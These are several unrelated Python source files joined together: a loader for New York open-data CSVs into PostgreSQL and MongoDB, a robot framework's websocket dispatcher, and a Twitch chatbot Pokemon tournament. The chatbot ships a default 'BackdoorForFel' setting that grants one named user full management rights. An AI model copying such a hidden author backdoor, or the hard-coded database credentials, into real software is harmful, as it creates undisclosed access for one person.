'total_noncritical_violations','nysdoh_gazetteer_1980','inspection_type','inspection_comments']
df4_distinct = df4.drop_duplicates(subset=['nys_health_operation_id','date_of_inspection','violation_item'], keep="first", inplace=False)
df4_distinct.to_sql('food_service_inspections', engine,schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadAdultArrests():
df = pd.read_csv("./Adult_Arrests_by_County___Beginning_1970.csv")
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# Food Service Violations
print("Loading Main Table")
df1 = df[['County','Year','Drug Felony','Violent Felony','DWI Felony','Other Felony','Drug Misd','DWI Misd','Property Misd','Other Misd']]
df_distinct = df1.drop_duplicates(keep="first", inplace=False)
df_distinct = df_distinct.dropna(how='any',axis=0)
df_distinct.columns = ['county','year','drug_felony','violent_felony','dwi_felony','other_felony','drug_misdemeanor','dwi_misdemeanor',
'property_misdemeanor','other_misdemeanor']
df_distinct.to_sql('adult_arrests', engine, schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadLiquorDataset():
df = pd.read_csv("./Liquor_Authority_Quarterly_List_of_Active_Licenses.csv", low_memory = False)
cur = conn.cursor()
engine = create_engine('postgresql+psycopg2://test5:test5@localhost/test5')
# city_zip_map Violations
print("Loading Liquor Table")
df1 = df[['Zip','City','State']]
df1.columns = ['zip','city','state']
result_df = df1.drop_duplicates(subset=['zip'])
result_df.to_sql('city_zip_map', engine, schema='public',index=False, if_exists='append')
#LIQUOR_AGENCY
print("Loading Liquor Agency")
df2 = df[['Agency Zone Office Number','Agency Zone Office Name']]
df2.columns = ['office_number','office_name']
df2_unique = df2.drop_duplicates(subset=['office_number'])
df2_unique.to_sql('liquor_agency', engine, schema='public',index=False, if_exists='append')
conn.commit()
#LIQUOR_LICENSE
print("Loading License Type")
df3 = df[['License Type Code','License Class Code','License Type Name']]
df3.columns = ['license_type_code','license_class_code','license_type_name']
df3_unique = df3.drop_duplicates(subset=['license_type_code'])
df3_unique.to_sql('license_types', engine, schema='public',index=False, if_exists='append')
conn.commit()
#LIQUOR_LICENSE
print("Loading Liquor License")
df4 = df[['County Name (Licensee)','License Serial Number','License Type Code','Premises Name','Doing Business As (DBA)','Actual Address of Premises (Address1)',
'Zip','Latitude','Longitude','License Original Issue Date','License Effective Date','License Expiration Date','License Certificate Number']]
df4.columns = ['county','license_serial_no','license_type_code','premise_name','doing_business_as','address','zipcode',
'latitude','longitude','issue_date','effective_date','expiration_date','license_certificate_number']
df4_unique = df4.drop_duplicates(subset=['license_serial_no'])
df4_unique.to_sql('liquor_license', engine, schema='public',index=False, if_exists='append')
conn.commit()
print("Done")
def loadNoSQLData():
myclient = pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["dbms"]
mycol = mydb["insuranceBeneficiaries"]
with open('unemploymentBenefits.json','r') as data_file:
data_json = json.load(data_file)
#Insert Data
mycol.remove()
mycol.insert(data_json)
liquorDataset = threading.Thread(target=loadLiquorDataset(), args=(1,))
arrestDataset = threading.Thread(target=loadAdultArrests(), args=(1,))
foodServiceDataset = threading.Thread(target=loadFoodServices(), args=(1,))
insuranceDataset = threading.Thread(target=loadNoSQLData(), args=(1,))
liquorDataset.start()
arrestDataset.start()
foodServiceDataset.start()
insuranceDataset.start()
|
dispatcher.py
|
import logging
import os
import socket
import time
import typing as T
from threading import Thread
from traceback import format_exc
import stopit
import websocket
from rembrain_robot_framework.ws import WsCommandType, WsRequest
class WsDispatcher:
CONNECTION_RETRIES = 3
def __init__(self, propagate_log=True, proc_name=""):
"""
:param propagate_log: whether to propagate the logs to the root logger
if False, then a separate logger is created that just writes to the stderr
"""
self.ws: T.Optional[websocket.WebSocket] = None
self._reader: T.Optional[Thread] = None
self.log = self._get_logger(propagate_log, proc_name)
def open(self) -> None:
if not self.ws or not self.ws.connected:
self.log.info("Opening websocket connection")
# Turn on SO_REUSEADDR so we can reuse hung sockets
for i in range(self.CONNECTION_RETRIES):
with stopit.ThreadingTimeout(0.5):
self.ws = websocket.WebSocket(sockopt=((socket.SOL_SOCKET, socket.SO_REUSEADDR, 1),))
self.ws.connect(os.environ["WEBSOCKET_GATE_URL"])
break
else:
err_msg = f"Method 'websocket.connect()' failed to connect after {self.CONNECTION_RETRIES} retries"
self.log.error(err_msg)
raise Exception(err_msg)
# todo remove it ?
self.ws.settimeout(10.0)
self._end_silent_reader()
def close(self) -> None:
try:
if self.ws:
self.log.info("Closing websocket connection")
self.ws.close()
except Exception:
self.log.error(f"WsDispatcher: ws close failed. Reason: {format_exc()}.")
self.ws = None
self._end_silent_reader()
def pull(self, request: WsRequest) -> T.Generator[T.Union[str, bytes], None, None]:
"""
Open socket, send 'PULL' command to websocket and receive data constantly.
:param request - request body
:return: generator with response data
"""
while True:
try:
self.open()
self.ws.send(request.json())
while True:
if not self.ws.connected:
break
response: T.Union[str, bytes] = self.ws.recv()
if isinstance(response, bytes) or (isinstance(response, str) and response != WsCommandType.PING):
yield response
except Exception:
err_msg = f"WsDispatcher ERROR: SEND '{WsCommandType.PULL}' command failed. Reason: {format_exc()}."
self.log.error(err_msg)
time.sleep(5)
self.close()
# todo refactor params
def push(
self, request: WsRequest, retry_times: T.Optional[int] = None, delay: T.Optional[int] = None
) -> T.Optional[T.Union[str, bytes]]:
"""
Open socket and send 'PUSH' command to websocket.
:param request - request body
:param retry_times - repeats, if retry_times is None => infinite generator
:param delay - (optional) sleep interval in seconds if it needs
:return: ws response
"""
repeats: T.Iterator = iter(int, 1) if retry_times is None else range(retry_times)
for _ in repeats:
try:
self.open()
self.ws.send(request.json())
return self.ws.recv()
except socket.error:
self.close()
if retry_times is None:
time.sleep(5.0)
except Exception:
self.log.error(f"WsDispatcher: Send '{WsCommandType.PUSH}' command failed. Reason: {format_exc()}.")
self.close()
# todo try to remove this code
if delay:
time.sleep(delay)
def push_loop(
self, request: WsRequest, data: T.Union[str, bytes] = b""
) -> T.Generator[T.Union[str, bytes], bytes, None]:
"""
Open socket, send 'PUSH' command to websocket with auth data and then send data constantly.
:param request - request body
:param data - bytes/str data for request
:return: ws response
"""
while True:
try:
self.open()
self.ws.send(request.json())
self.ws.recv()
# todo does it need ?
self.ws.settimeout(1.0)
self._start_silent_reader()
while True:
if not data:
data = yield # for first query (for next())
if isinstance(data, bytes):
self.ws.send_binary(data)
data = yield
elif isinstance(data, str):
self.ws.send(data)
data = yield
else:
err_msg = (
f"Data type {type(data)} is invalid. "
f"You can only send either binary data, or string messages."
)
self.log.error(err_msg)
raise Exception(err_msg)
except Exception:
err_msg = f"WsDispatcher: Send '{WsCommandType.PUSH_LOOP}' command failed. Reason: {format_exc()}."
self.log.error(err_msg)
self.close()
time.sleep(2.0)
def _start_silent_reader(self) -> None:
self._reader = Thread(target=self._silent_recv, daemon=True)
self._stop_reader = False
self._reader.start()
def _end_silent_reader(self) -> None:
if self._reader:
self._stop_reader = True
self._reader.join()
self._reader = None
def _silent_recv(self) -> None:
while not self._stop_reader:
time.sleep(0.01)
try:
self.ws.recv()
except:
pass
@staticmethod
def _get_logger(propagate: bool, proc_name: str) -> logging.Logger:
"""
Since WsDispatcher is used inside the websocket logger (See LogHandler class in `logger/handler.py`),
we need to make sure we don't accidentally have an error loop where it breaks inside the logging framework.
So to handle that, we turn off propagation to the root logger and create a simple StreamHandler logger.
"""
pid = os.getpid()
logger = logging.getLogger(f"{__name__} ({proc_name}:{pid})")
logger.propagate = propagate
# If this is not a propagating logger, then set it up with just a StreamHandler
if not propagate:
logger.setLevel(logging.INFO)
for handler in logger.handlers:
logger.removeHandler(handler)
handler = logging.StreamHandler()
formatter = logging.Formatter("%(levelname)s:%(name)s:%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger
|
PokemonTournament_StreamlabsSystem.py
|
#---------------------------------------
# Import Libraries
#---------------------------------------
import clr
import sys
import json
import os
import random
import ctypes
import threading
import time
import codecs
from datetime import datetime
from datetime import timedelta
#---------------------------------------
# [Required] Script Information
#---------------------------------------
debuggingMode = False
ScriptName = "Tournament - Pokemon"
Website = "https://twitter.com/Felreach"
Description = "Tournament - Pokemon"
Creator = "Felreach"
Version = "1.0.6"
#---------------------------------------
# Classes
#---------------------------------------
class Fighter:
def __init__(self):
self.name = None
self.deckType = None
self.currentWinnings = 0
return
def __init__(self, twitchname, type, winnings):
self.name = twitchname
self.deckType = type
self.currentWinnings = winnings
return
class Match:
def __init__(self,childMatch1, childMatch2, depth):
self.previousMatchTop = childMatch1 # stored as ID
self.previousMatchBot = childMatch2 # stored as ID
self.nextMatch = None
self.trainerTop = None
self.trainerBot = None
self.winner = None
self.loser = None
self.remainingProgression = 1
self.hasProgressed = False
self.depth = depth
return
#---------------------------------------
# Set Variables
#---------------------------------------
configFile = "TournamentConfig.json"
settings = {}
user = ""
RandomInstance = random.SystemRandom()
randomNames = ["Salty", "Monday", "Briana", "Blossom", "Lucilla", "Dorris", "Elia", "Lisbeth", "Esther", "Angila", "Roger", "Particia", "Lilia", "Tabetha", "Leopoldo", "Lanny", "Elene", "Anton", "Demetrius", "Von", "Raymond", "Amie", "Sharlene", "Vickey", "Kandace", "Darrel", "Jayson", "Bonita", "Nicolette", "Mendy", "Carson", "Ouida"]
tickCounter = 0
#tournament data
stadiumLocked = False
tournamentOpened = False
tournamentStarted = False
tournamentReady = True
enteredTrainers = []
allTrainers = []
allMatches = []
tournamentDepth = -1
currentProgressionDepth = -1
startBracket = []
currentTick = ""
#announcement
lastAnnouncementTime = datetime.now()
#command params
cmdParamListTypes = {"types", "listtypes"}
cmdParamReadyTourny = {"prepare", "readyup"}
cmdParamStartTourny = {"start"}
cmdParamLockTourny = {"lock"}
cmdParamListTrainers = {"trainers", "users"}
#battle defs
TYPES = ["normal", "fighting", "flying", "poison", "ground", "rock", "bug", "ghost", "steel", "fire", "water", "grass", "electric", "psychic", "ice", "dragon", "dark", "fairy"]
INEFFECTIVE_AGAINST = { "normal" : {"ghost"}, "fighting" : {"ghost"}, "poison" : {"steel"}, "ground" : {"flying"}, "ghost" : {"normal"}, "electric" : {"ground"}, "psychic" : {"dark"}, "dragon" : {"fairy"}}
WEAK_AGAINST = { "normal" : {"rock", "steel"}, "fighting" : {"flying", "poison", "bug", "psychic", "fairy"}, "flying": {"rock", "steel", "electric"}, "poison" : {"poison", "ground", "rock", "ghost"}, "ground" : {"bug", "grass"}, "rock" : {"fighting", "ground", "steel"}, "bug": {"fighting", "flying", "poison", "ghost", "steel", "fire", "fairy"}, "ghost" : {"dark"}, "steel" : {"steel", "fire", "water", "electric"}, "fire" : {"rock", "fire", "water", "dragon"}, "water" : {"water", "grass", "dragon"}, "grass" : {"flying", "poison", "bug", "steel", "fire", "grass", "dragon"}, "electric" : {"grass", "electric", "dragon"}, "psychic" : {"steel", "psychic"}, "ice" : {"steel", "fire", "water", "ice"}, "dragon" : {"steel"}, "dark" : {"fighting", "dark", "fairy"}, "fairy" : {"poison", "steel", "fire"}}
STRONG_AGAINST = { "fighting" : {"normal", "rock", "steel", "ice", "dark"}, "flying" : {"fighting", "bug", "grass"}, "poison": {"grass"}, "ground" : {"poison", "rock", "steel", "fire", "electric"}, "rock" : {"flying", "bug", "fire", "ice"}, "bug" :{"grass", "psychic", "dark"}, "ghost" : {"ghost", "psychic"}, "steel" : {"rock", "ice", "fairy"}, "fire" : {"bug", "steel", "grass", "ice"}, "water": {"ground", "rock", "fire"}, "grass" : {"ground", "rock", "water"}, "electric" : {"flying", "water"}, "psychic" : {"fighting", "poison"}, "ice" : {"flying", "ground", "grass", "dragon"}, "dragon" : {"dragon"}, "dark" : {"ghost", "psychic"}, "fairy" : {"fighting", "dragon", "dark"}}
ineffectiveStrength = 20.0
weakStrength = 40.0
evenStrength = 50.0
strongStrength = 70.0
#threads
threadsKeepAlive = True
entranceLockTimerThreadActive = False
startPauseTimerThreadActive = False
tournamentTimerThreadActive = False
cooldownTimerThreadActive = False
#---------------------------------------
# Def functions
#---------------------------------------
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
def GetBattleDuration(ours, against, isFinals = False):
if ours == None or against == None:
return 1
result1 = GetStrength(ours, against)
result2 = GetStrength(against, ours)
r = 1
if result1 == "strong":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 1
elif result2 == "weak":
r = 1
elif result2 == "ineffective":
r = 1
if result1 == "even":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 2
elif result2 == "ineffective":
r = 2
if result1 == "weak":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 3
elif result2 == "ineffective":
r = 4
if result1 == "ineffective":
if result2 == "strong":
r = 1
elif result2 == "even":
r = 2
elif result2 == "weak":
r = 4
elif result2 == "ineffective":
r = 5
if isFinals == True:
r = max(4, 2 * r)
return r
def GetStrength(ours, against):
if(ours in TYPES):
if(against in TYPES):
if(STRONG_AGAINST.has_key(ours)):
if(against in STRONG_AGAINST[ours]):
return "strong"
if(WEAK_AGAINST.has_key(ours)):
if(against in WEAK_AGAINST[ours]):
return "weak"
if(INEFFECTIVE_AGAINST.has_key(ours)):
if(against in INEFFECTIVE_AGAINST[ours]):
return "ineffective"
return "even"
def GetStrengthValue(ours, against):
if(ours in TYPES):
if(against in TYPES):
if(STRONG_AGAINST.has_key(ours)):
if(against in STRONG_AGAINST[ours]):
return strongStrength
if(WEAK_AGAINST.has_key(ours)):
if(against in WEAK_AGAINST[ours]):
return weakStrength
if(INEFFECTIVE_AGAINST.has_key(ours)):
if(against in INEFFECTIVE_AGAINST[ours]):
return ineffectiveStrength
return evenStrength
def Battle(first, second):
result = {"winner" : None, "loser" : None}
if(first in TYPES):
if(second in TYPES):
strength1 = GetStrengthValue(first, second)
strength2 = GetStrengthValue(second, first)
toWin = strength1 / (strength1 + strength2)
if( RandomInstance.random() < toWin ):
result["winner"] = "first"
else :
result["winner"] = "second"
else:
result["winner"] = "first"
else:
if(second in TYPES):
result["winner"] = "second"
if result["winner"] == "first":
result["loser"] == "second"
elif result["winner"] == "second":
result["loser"] == "first"
return result
def ResolveBattle(battleToResolve):
# mark progressed
battleToResolve.hasProgressed = True
# quick resolve because theres isnt an opponent
if battleToResolve.trainerTop != None and battleToResolve.trainerBot == None:
battleToResolve.winner = battleToResolve.trainerTop
battleToResolve.loser = None
return battleToResolve
# quick resolve because theres isnt an opponent
if battleToResolve.trainerTop == None and battleToResolve.trainerBot != None:
battleToResolve.winner = battleToResolve.trainerBot
battleToResolve.loser = None
return battleToResolve
if battleToResolve.trainerTop == None and battleToResolve.trainerBot == None:
battleToResolve.winner = None
battleToResolve.loser = None
return battleToResolve
if battleToResolve.remainingProgression > 0:
return battleToResolve
# get types
typeA = allTrainers[battleToResolve.trainerTop].deckType
typeB = allTrainers[battleToResolve.trainerBot].deckType
result = Battle(typeA, typeB)
if result["winner"] == "first":
battleToResolve.winner = battleToResolve.trainerTop
battleToResolve.loser = battleToResolve.trainerBot
else:
battleToResolve.winner = battleToResolve.trainerBot
battleToResolve.loser = battleToResolve.trainerTop
allTrainers[battleToResolve.winner].currentWinnings += settings["PrizePerBattle"]
return battleToResolve
def InitBracket():
global RandomInstance
global startBracket, allMatches, tournamentDepth, currentProgressionDepth
startBracket = []
allMatches = []
enteredCount = len(enteredTrainers)
if enteredCount <= 0:
return
# count up the leafs in the tournament tree
startCount = 2
tournamentDepth = 0
while startCount < enteredCount:
startCount *= 2
tournamentDepth += 1
currentProgressionDepth = tournamentDepth + 1 # set current finished depth
Debug("start count, entered count:" + str(startCount) + "," + str(enteredCount))
#init the brakcets
startBracket = range(enteredCount) # map out the trainer IDs
if startCount - enteredCount != 0:
c = (startCount - enteredCount)
n =[ None ] * c
startBracket.extend(n)
RandomInstance.shuffle(startBracket)
Debug("filling matches:")
#fill matches
parentDictionary = {1 : 0, 2: 0}
d = 0
index = 0
if d != tournamentDepth:
allMatches.append(Match(childMatch1 = (index * 2+1), childMatch2 = (index * 2+2), depth = d))
else:
allMatches.append(Match(childMatch1 = None, childMatch2 = None, depth=d))
while d < tournamentDepth:
d += 1
for x in range(2**d):
index += 1
if d != tournamentDepth:
allMatches.append(Match(childMatch1 = index * 2+1, childMatch2 = index * 2+2, depth = d))
parentDictionary[index * 2+1] = index
parentDictionary[index * 2+2] = index
else:
allMatches.append(Match(childMatch1 = None, childMatch2 = None, depth = d))
Debug("filling parents:")
# fill parents
index = 0
while index < len(allMatches):
if index in parentDictionary:
allMatches[index].nextMatch = parentDictionary[index]
index += 1
Debug("filling lowest depth matches with participants:")
# fill the participants of all the matches at the lowest depth
start = len(allMatches) - startCount/2 #figure out where the last matches start (the tournament matches are stored as a binary heap in an array)
index = 0
for x in range(start, len(allMatches)):
#x = start + y
Debug("x: "+ str(x))
allMatches[x].trainerTop = startBracket[index]
allMatches[x].trainerBot = startBracket[index+1]
# update battle duration
type1 = None
type2 = None
if allMatches[x].trainerTop != None:
type1 = allTrainers[allMatches[x].trainerTop].deckType
if allMatches[x].trainerBot != None:
type2 = allTrainers[allMatches[x].trainerBot].deckType
allMatches[x].remainingProgression = GetBattleDuration(type1, type2)
index += 2
if len(enteredTrainers) <= 2 and len(enteredTrainers) > 0:
allMatches[0].remainingProgression = GetBattleDuration(type1, type2, True)
return
def advanceWinner(currentMatch):
global allMatches
next = allMatches[currentMatch].nextMatch
if next != None:
if currentMatch == allMatches[next].previousMatchTop:
allMatches[next].trainerTop = allMatches[currentMatch].winner
if currentMatch == allMatches[next].previousMatchBot:
allMatches[next].trainerBot = allMatches[currentMatch].winner
allMatches[next].remainingProgression = 1
if allMatches[next].trainerTop != None and allMatches[next].trainerBot != None:
type1 = allTrainers[allMatches[next].trainerTop].deckType
type2 = allTrainers[allMatches[next].trainerBot].deckType
if next == 0: # we are going into finals, use longer duration
allMatches[next].remainingProgression = GetBattleDuration(type1, type2, True)
else:
allMatches[next].remainingProgression = GetBattleDuration(type1, type2)
return
def advanceTournament():
global allMatches, currentProgressionDepth
Debug("advancing tournament")
result = {"IsFinalBattle" : False, "Battles" : [], "AdvancementStyle" : settings["AdvancementStyle"], "Winners": [], "losers" : []}
result["AdvancementStyle"] = settings["AdvancementStyle"]
# search for max depth
i = len(allMatches) - 1
maxDepth = -1
while i >= 0:
if allMatches[i].remainingProgression > 0:
maxDepth = max(allMatches[i].depth, maxDepth)
i -= 1
Debug("advanceTournament() max depth:" + str(maxDepth))
currentProgressionDepth = maxDepth + 1
# this is last battle
if maxDepth == 0:
Debug("advanceTournament() final battle:")
result["IsFinalBattle"] = True
result["BattleHasProgressed"] = allMatches[0].hasProgressed
if allMatches[0].remainingProgression > 0 and settings["FinalsStyle"] == "Long":
allMatches[0].remainingProgression -= 1
allMatches[0].hasProgressed = True
elif allMatches[0].remainingProgression > 0 and settings["FinalsStyle"] == "Short":
allMatches[0].remainingProgression = 0
allMatches[0].hasProgressed = True
if allMatches[0].remainingProgression == 0:
currentProgressionDepth = 0
allMatches[0] = ResolveBattle(allMatches[0])
# no need to update parent here, this is last battle
result["Winners"].append(allMatches[0].winner)
result["losers"].append(allMatches[0].loser)
result["Battles"].append(allMatches[0])
return result
# PER ROUND
if settings["AdvancementStyle"] == "PerRound":
Debug("advanceTournament() per round:")
i = len(allMatches) - 1
while i >= 0:
if allMatches[i].remainingProgression > 0 and allMatches[i].depth == maxDepth:
allMatches[i].remainingProgression = 0
allMatches[i].hasProgressed = True
allMatches[i] = ResolveBattle(allMatches[i])
advanceWinner(i)
# pass winners into the next battles
result["Winners"].append(allMatches[i].winner)
result["losers"].append(allMatches[i].loser)
result["Battles"].append(allMatches[i])
pass
i -= 1
# PER BATTLE
if settings["AdvancementStyle"] == "PerBattle":
Debug("advanceTournament() per battle:")
i = len(allMatches) - 1
# find first match we can advance
while i >= 0:
if allMatches[i].remainingProgression > 0:
if settings["BattleStyle"] == "Long":
allMatches[i].remainingProgression -= 1
elif settings["BattleStyle"] == "Short":
allMatches[i].remainingProgression = 0
Debug("advancing match-remaining progression: " + str(allMatches[i].remainingProgression))
result["BattleHasProgressed"] = allMatches[i].hasProgressed
allMatches[i].hasProgressed = True
# resolve battle
if allMatches[i].remainingProgression == 0:
allMatches[i] = ResolveBattle(allMatches[i])
advanceWinner(i)
break
i -= 1
result["Winners"].append(allMatches[i].winner)
result["losers"].append(allMatches[i].loser)
result["Battles"].append(allMatches[i])
# update currentProgressionDepth
i = len(allMatches) - 1
maxDepth = -1
while i >= 0:
if allMatches[i].remainingProgression > 0:
maxDepth = max(allMatches[i].depth, maxDepth)
i -= 1
currentProgressionDepth = maxDepth + 1
return result
def startEntranceLockTimer():
global settings, currentTick
Debug("startEntranceLockTimer() called")
currentTick = "EntranceLock"
return
def EntranceLockTimerThread():
global entranceLockTimerThreadActive
entranceLockTimerThreadActive = True
remaining = settings["TournamentSignUpPeriod"]
if remaining > 0:
while remaining > 0 and entranceLockTimerThreadActive and threadsKeepAlive:
if remaining % 60 == 0 or remaining == 30 or remaining == 10:
s = "Tournament sign up ends in " + str(remaining) + " seconds."
SendMsg(s)
Debug("EntranceLockTimerThread() tick")
remaining -= 1
time.sleep(1)
if not entranceLockTimerThreadActive : #this would mean we were cancelled from the outside so we need to do some cleanup
return
entranceLockTimerThreadActive = False
startTournament()
return
def startTournament():
global tournamentOpened, tournamentStarted, currentTick, entranceLockTimerThreadActive
tournamentStarted = True
Debug("startTournament()")
entranceLockTimerThreadActive = False
currentTick = "StartPause"
return
def StartPauseTimerThread():
global startPauseTimerThreadActive, currentTick
startPauseTimerThreadActive = True
currentTime = 0
while currentTime < 10 and startPauseTimerThreadActive and threadsKeepAlive:
Debug("StartPauseTimerThread() tick")
currentTime += 1
time.sleep(1)
if not startPauseTimerThreadActive : #this would mean we were cancelled from the outside so we need to do some cleanup
return
InitBracket()
Debug("end of start pause thread")
currentTick = "Tournament"
startPauseTimerThreadActive = False
return
def TournamentTimerThread():
global tournamentTimerThreadActive
tournamentTimerThreadActive = True
currentTime = 0
timerDuration = settings["PauseBetweenRounds"]
dontSkip = settings["PauseBetweenRounds"] > 0
if currentProgressionDepth == 1:
timerDuration = settings["PauseBetweenFinalRounds"]
dontSkip = settings["PauseBetweenFinalRounds"] > 0
while currentTime < timerDuration and tournamentTimerThreadActive and threadsKeepAlive and dontSkip:
Debug("TournamentTimerThread() tick")
currentTime += 1
time.sleep(1)
if not tournamentTimerThreadActive: #this would mean we were cancelled from the outside so we need to do some cleanup
resetTournament()
return
tournamentTimerThreadActive = False
return
def CooldownTimerThread():
global cooldownTimerThreadActive
cooldownTimerThreadActive = True
currentTime = 0
while currentTime < settings["TournamentPreparationTime"] and cooldownTimerThreadActive and threadsKeepAlive:
currentTime += 1
time.sleep(1)
if not cooldownTimerThreadActive: #this would mean we were cancelled from the outside so we need to do some cleanup
resetTournament()
return
resetTournament()
s = "Stadium is ready to host another tournament! Use " + str(settings["Command"]) + " <pokemon type> to enter."
SendMsg(s)
cooldownTimerThreadActive = False
return
def finishTournament():
global tournamentOpened, tournamentStarted, tournamentReady
tournamentOpened = False
tournamentStarted = False
tournamentReady = False
cooldownTournament()
return
def cooldownTournament():
global currentTick, tournamentOpened, tournamentReady, tournamentStarted, lastAnnouncementTime
currentTick = "Cooldown"
lastAnnouncementTime = datetime.now()
return
#hard resets the tournament, also tells all the threads to stop
def resetTournament(unlock = False):
global stadiumLocked, tournamentReady, tournamentOpened, tournamentStarted, currentTick
global enteredTrainers, allTrainers, currentBracket, startBracket, currentProgressionDepth, tournamentDepth, allMatches
global entranceLockTimerThreadActive, startPauseTimerThreadActive, tournamentTimerThreadActive, cooldownTimerThreadActive
global lastAnnouncementTime
currentTick = ""
tournamentReady = True
tournamentOpened = False
tournamentStarted = False
stadiumLocked = settings["StadiumStartsLocked"]
if unlock:
stadiumLocked = False
enteredTrainers = []
allTrainers = []
currentBracket = []
startBracket = []
allMatches = []
currentProgressionDepth = -1
tournamentDepth = -1
entranceLockTimerThreadActive = False
startPauseTimerThreadActive = False
tournamentTimerThreadActive = False
cooldownTimerThreadActive = False
lastAnnouncementTime = datetime.now()
return
def getBattleStatus():
result = "Battles: "
if len(allMatches) > 0:
for i in range(len(allMatches)):
result += str(i) + "-["
result += "Next:" + str(allMatches[i].nextMatch) + " "
result += "PrevTop:" + str(allMatches[i].previousMatchTop) + " "
result += "PrevBot:" + str(allMatches[i].previousMatchBot) + " "
result += "Trainers:" + str(allMatches[i].trainerTop) + "|" + str(allMatches[i].trainerBot) + " "
result += "],"
return result
def getTournamentStatus():
activeThread = "None"
if entranceLockTimerThreadActive:
activeThread = "entrance lock"
if startPauseTimerThreadActive:
activeThread = "start pause"
if tournamentTimerThreadActive:
activeThread = "tournament"
if cooldownTimerThreadActive:
activeThread = "cooldown"
result = "Tournament Status: "
result += "Locked: " + str(stadiumLocked) + " ; "
result += "Ready: " + str(tournamentReady) + " ; "
result += "Opened: " + str(tournamentOpened) + " ; "
result += "Started: " + str(tournamentStarted) + " ; "
result += "Tournament depth current/total: " + str(currentProgressionDepth) + "/" + str(tournamentDepth) + " ; "
result += "Matches count: " + str(len(allMatches)) + " ; "
result += "FinalsStyle: " + settings["FinalsStyle"] + " ; "
result += "BattleStyle: " + settings["BattleStyle"] + " ; "
result += "AdvancementStyle: " + settings["AdvancementStyle"] + " ; "
result += "ActiveThread: " + activeThread + " ; "
return result
def ScriptToggled(state):
global threadsKeepAlive
Debug("ScriptToggled: " + str(state))
# if enabled again tell the script to keep the threads running again
if state:
threadsKeepAlive = True
s = "Stadium script enabled."
if stadiumLocked:
s += " Stadium is locked, when it unlocks use " + settings["Command"] + " <pokemon type> to enter."
else:
s += " Try entering the tournament using " + settings["Command"] + " <pokemon type>"
Parent.SendTwitchMessage(s)
else: # if the script gets disabled, stop all timers and resets the textfiles
resetTournament()
Unload()
return
def Unload():
global threadsKeepAlive
threadsKeepAlive = False
return
def Debug(message):
if debuggingMode:
Parent.Log("PokemonTournament", message)
def SendMsg(message):
if message == "":
return
if settings["PrefaceMessages"] == True:
message = "Stadium: " + message
Parent.SendTwitchMessage(message)
return
#---------------------------------------
# [Required] Intialize Data (Only called on Load)
#---------------------------------------
def Init():
global settings, configFile, RandomInstance
global stadiumLocked, ineffectiveStrength, weakStrength, evenStrength, strongStrength
RandomInstance = random.SystemRandom()
path = os.path.dirname(__file__)
try:
with codecs.open(os.path.join(path, configFile), encoding='utf-8-sig', mode='r') as file:
settings = json.load(file, encoding='utf-8-sig')
except:
settings = {
"OnlyWhenLive": False,
"Command": "!stadium",
"Permission": "Everyone",
"ManagerPermission": "Moderator",
"AllowRegularsToManage" : False,
"EntryCost": 0,
"UseCommonResponses" : True,
"ShowTrainerType" : True,
"EnableInvalidTypeResponse" : True,
"EnableEntryResponse" : True,
"EnableEntryCostResponse" : True,
"EnablePeriodicAnnouncement" : True,
"PeriodicAnnouncementEvenWhenLocked" : True,
"PeriodicAnnouncementPeriod" : 300,
"EnablePayout" : False,
"PrizePerBattle": 5,
"FinalPrizePerTrainer": 5,
"FinalPrize": 200,
"CurrencyName" : "of Chat Currency",
"UseExternalPayout" : False,
"ExternalPayoutCommand" : "!addpoints $user $amount",
"UtilityCooldown": 5,
"TypeIneffectiveValue" : 20,
"TypeWeakValue" : 40,
"TypeEvenValue" : 50,
"TypeStrongValue" : 70,
"ResultAnnoucementStyle" : "Both",
"PrefaceMessages" : False,
"OnCooldownResponse": "$user, the command is still on cooldown for $cd seconds!",
"OnUserCooldownResponse": "$user the command is still on user cooldown for $cd seconds!",
"StadiumStartsLocked" : False,
"AdvancementStyle" : "PerRound",
"BattleStyle": "Long",
"FinalsStyle": "Long",
"TournamentSignUpPeriod" : 150,
"PauseBetweenRounds" : 20,
"PauseBetweenFinalRounds" : 15,
"TournamentPreparationTime" : 120,
"BackdoorForFel" : True
}
stadiumLocked = settings["StadiumStartsLocked"]
ineffectiveStrength = settings["TypeIneffectiveValue"]
weakStrength = settings["TypeWeakValue"]
evenStrength = settings["TypeEvenValue"]
strongStrength = settings["TypeStrongValue"]
Debug("Init()")
return
#---------------------------------------
# [Required] Execute Data / Process Messages
#---------------------------------------
def Execute(data):
global user
global tournamentOpened, tournamentReady, tournamentStarted, stadiumLocked
global enteredTrainers, allTrainers
global RandomInstance
if data.IsChatMessage():
Debug("processing msg")
user = data.User
FelOverride = user.lower() == "felreach" and settings["BackdoorForFel"] == True
tempResponseString = ""
if (data.GetParam(0).lower() == settings["Command"]):
# skip the command when stream isnt live
if settings["OnlyWhenLive"] and not Parent.IsLive():
SendMsg("The Stadium cannot be used because the stream isn't live!")
return
hasPermission = Parent.HasPermission(data.User, settings["Permission"], "")
hasManagePermission = Parent.HasPermission(data.User, settings["ManagerPermission"], "")
if settings["AllowRegularsToManage"]:
hasManagePermission = hasManagePermission or Parent.HasPermission(data.User, "Regular", "")
if FelOverride:
hasPermission = True
hasManagePermission = True
#EMPTY COMMAND
if (data.GetParam(1) == "" and hasPermission):
if stadiumLocked:
tempResponseString = "Stadium has been unlocked and is ready for next tournament! Sign up with " + settings["Command"] + " <pokemon type>"
else:
if currentTick == "Cooldown":
tempResponseString = "Stadium is being prepared for the next turnament. When its ready sign up with " + settings["Command"] + " <pokemon type>"
else:
if tournamentStarted:
tempResponseString = "Tournament is already already under way @$user! Sign up with " + settings["Command"] + " <pokemon type>"
elif tournamentOpened:
tempResponseString = "To sign up into the tournament use " + settings["Command"] + " <pokemon type>"
elif tournamentReady:
tempResponseString = "To sign up into the tournament use " + settings["Command"] + " <pokemon type>"
# OPEN STADIUM
elif(data.GetParam(1).lower() in cmdParamReadyTourny and hasManagePermission):
if stadiumLocked:
resetTournament(True)
tempResponseString = "Stadium has been unlocked and is ready for next tournament! Sign up with " + settings["Command"] + " <pokemon type>"
else:
